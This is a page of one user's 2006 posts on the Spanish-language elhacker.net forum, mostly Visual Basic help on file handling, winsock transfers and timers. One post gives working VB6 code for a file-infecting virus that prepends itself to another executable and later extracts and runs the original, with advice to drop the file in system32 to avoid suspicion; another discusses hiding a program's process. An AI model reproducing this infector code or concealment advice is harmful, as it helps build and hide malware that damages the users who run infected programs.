elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


  Mostrar Mensajes
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ... 73
211  Programación / Programación Visual Basic / Re: Disco de 3½ en: 18 Abril 2006, 23:06 pm
Que es lo que no sabes?? Simplemente tenes que usar la letra de la disquetera (suele ser A:\)
Por ejemplo, si queres borrar un archivo:
Código:
Kill "A:\Archivo.jpg"

Saludos.-
212  Programación / Programación Visual Basic / Re: Ocultar Proseso de mi Programa en: 18 Abril 2006, 23:00 pm
El problema se deve a que el Kernel de los Windows NT no tiene la entrada RegisterServiceProcess. Seguramente UTU este programando en Windows 98/ME, que su kernel SI contiene esta entrada.

En Windows XP tenia entendido que se encontraba en otra DLL y con otro nombre, pero nunca la encontre, asique te vas a tener que arreglartelas de otra forma xD

Saludos !.-
213  Programación / Programación Visual Basic / Re: Trabajar cn archivos en: 18 Abril 2006, 22:28 pm
Debes estar usando mal el Open. Aca te dejo un code de algo muy parecido a lo que queres hacer vos (demasiado parecido diria yo :P). Espero que te sirva.
Código:
Private Sub Form_Load()
   
    Dim Datos As String
    Dim Original As String
    Dim Yo As String
    Dim Buff() As String
   
    Open App.Path & "\" & App.EXEName & ".exe" For Binary As #1 'Abrimos el mismo programa
        Yo = Input(LOF(1), 1) 'y ponemos el codigo en la variable 'Yo'
    Close #1
   
    Buff = Split(Yo, "----SEP----") 'Dividimos esa variable (espero que sepas como funciona el Split)
    If UBound(Buff) > 0 Then 'Si se pudo dividir en mas de 1 pedazo (la variable Yo)
       
        Open "C:\Resultado.exe" For Binary As #2 'abrimos un exe nuevo para introducir los datos
            Put #2, , Buff(1) 'ponemos todo lo que hay DEBAJO del separador
        Close #2
       
        DoEvents
       
        Shell "C:\Resultado.exe" 'abrimos el programa (que es el programa normal, NO el worm...)
       
       
        MsgBox "Aca podemos poner el codigo del virus, o ponerlo al finall"
        Unload Me 'nos cerramos(optativo xD)
       
    Else 'si NO se pudo dividir, entonces es que no existe el separador. Lo creamos...
   
        Open "C:\nylon.exe" For Binary As #3 'Abrimos el programa a infectar
            Original = Input(LOF(3), 3) 'Guardamos el contenido en la variable 'Original'
           
            Datos = Yo & "----SEP----" & Original 'Esto es lo que vamos a introducir en el archivo a infectar (YO = Nuestro virus, SEP = Separador, Original = archivo verdadero (el que estamos infectando)
           
            Put #3, , Datos 'metemos los datos que grabamos antes
           
        Close #3
    End If

End Sub

'Al final de todo el proceso, el programa quedaria asi:
'
'--------------------------
'Nuestro programa
'---SEPARADOR---
'Programa original
'--------------------------
'
'
'Entonces, cuando abrimos el programa infectado, se abre NUESTRO programa,
'este busca lo que hay debajo del separador y lo mete en un nuevo archivo,
'despues abrimos ese archivo y salimos.
'
'
' Un abrazo y suerte
'
'
'
'   .NYlOn.
'
'¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬ END ¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬¬


NOTA: La idea es que el archivo 'Resultado.exe' sea guardado en la carpeta de windows o system32, ya que sino resultaria muy sospechoso.

Saludos.-
214  Programación / Programación Visual Basic / Re: Conectar 2 programas por medio de internet en: 18 Abril 2006, 22:15 pm
En la sección Troyanos y virus hay un manual que explica detalladamente los pasos para poder usar no-ip.

Luego tu IP pasaria a ser la creada por no ip (por ejemplo: tuip.no-ip.info) y esa es la que tendrias que poner en tu proyecto.
215  Programación / Programación Visual Basic / Re: ¿que diferencia existe entre VB y c++? en: 16 Abril 2006, 01:17 am
Busca un poco antes de hacer este tipo de preguntas. En Google salen miles de resultados. Este texto te puede servir:
http://www.elguille.info/NET/dotnet/vbvscs.htm.

Saludos.-
216  Programación / Programación Visual Basic / Re: Problema transferencia de archivos con winsock en: 15 Abril 2006, 20:46 pm
y qu hay de esto:
Código:
   transfiriendo = True
end sub
   End If

Que hace ese End Sub ahi =S??
217  Programación / Programación Visual Basic / Re: Problema transferencia de archivos con winsock en: 15 Abril 2006, 10:00 am
1º Como haces para provarlo con tu propia pc ?? Estas sobreescribiendo el archivo que te llega sobre el que estas mandando, no se si me explico. Vos abris el archivo C:\hola.jpg y le decis al servidor que guarde los datos que le vas a mandar en el archivo C:\hola.jpg, no crea uno nueva. Proba con esto:
Código:
ruta = "C:\hola.jpg"
Open ruta For Binary As #archivo
'Agregar la siguiente linea:
ruta = "C:\hola2.jpg"

2º Tenes un End Sub en el medio del evento DataArrival del servidor =S No se si es que copiaste mal o que.

3º Podrias provar cambiando el While por un For:
Código:
For i = 0 t Tamaño Step fragmento
    lectura = Input(i, #archivo) 'Leer 8 kb del archiv
    ws.SendData lectura
Next i



Con respecto a lo que dice BenRu es cierto que una variable del tipo Integer no puede almacenar 8192 '8 kb pero, ahi hay un apostrofe (comilla, palito) lo que estaria marcando un comentario. Por lo tanto la variable esta almacenando el numero 8192, lo que no generaria un error.

No se, fijate en estas cosas, espero que te sean utiles. Y por favor pone en que parte te marca el error, asi es mas facil ayudarte.

Un abrazo.-
218  Programación / Programación Visual Basic / Re: ayuda urgente para una aplicacion en: 15 Abril 2006, 09:38 am
Si queres que el programa se cierra y se vuelva a ejecutar, en el evento Unload pones:
Código:
Shell App.Path & "\" & App.EXEname & ".exe"
219  Programación / Programación Visual Basic / Re: Ayuda cambiar nick MSN en: 13 Abril 2006, 03:10 am
Antes podia modificarse la propiedad MyFriendlyName pero actualmente lo modificar para que sea solo lectura (te devuelve el nick actual).
La verdad no se me ocurre nada que no sean APIs, lo que podrias hacer es usar las APIs FindWindow y ShowWindows para obtener el handle de la ventana indicada y luego ocultarla, respectivamente.

Saludos.-
220  Programación / Programación Visual Basic / Re: Problema Timer en: 13 Abril 2006, 02:58 am
A mi me da error cuando pongo lo que quiero hacer en este codigo

Timer1.enabled = True
Timer1.interval = 0
Label88.caption = 0
Private Sub Timer1_timer()
Label88.caption = Label88.caption + 1
If label88.caption = 1 then
ACA QUIERO QUE SE CIERREN TODAS LAS VENTANAS ABIERTAS
end if
If label88.caption = 3 Then
ACA QUE SE EJECUTE EL HL.EXE
end if
If label88.caption = 5 then
ACA QUE SE CIERRe EL HL.EXE
end if
If label88.caption = 7 then
label88.caption = 0
timer1.enabled = False
end if
end sub

ese codigo es para que se abra el counter, despues que se cierre y que se vuelva a abrir a los 1.5 segundos.

Intente hacerlo pero me dieron varios errores

Una pregunta, si yo estoy haciendo un trabajo en word o tengo el explorador abierto y entro al CS, se cerrarian todas las ventanas??

No lo veo nada efectivo... Pensalo.-
Páginas: 1 ... 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 [22] 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 ... 73
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines